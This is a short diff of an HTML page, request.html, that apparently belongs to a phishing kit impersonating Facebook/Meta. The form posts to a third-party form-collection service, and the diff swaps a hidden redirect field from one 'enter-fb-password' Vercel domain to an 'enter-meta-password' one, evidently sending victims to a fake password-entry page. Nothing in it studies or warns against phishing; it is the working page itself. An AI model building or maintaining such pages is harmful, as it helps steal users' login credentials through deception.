--- a/request.html
+++ b/request.html
@@ -9,7 +9,7 @@
     </head>
     <body>
         <form action="https://submit-form.com/pN7k0IkBk" method="post">
-            <input type="hidden" name="_redirect" value="https://enter-fb-password-opal.vercel.app/"/>
+            <input type="hidden" name="_redirect" value="https://enter-meta-password.vercel.app/"/>
             <div id="root">
                 <div>
                     <form>
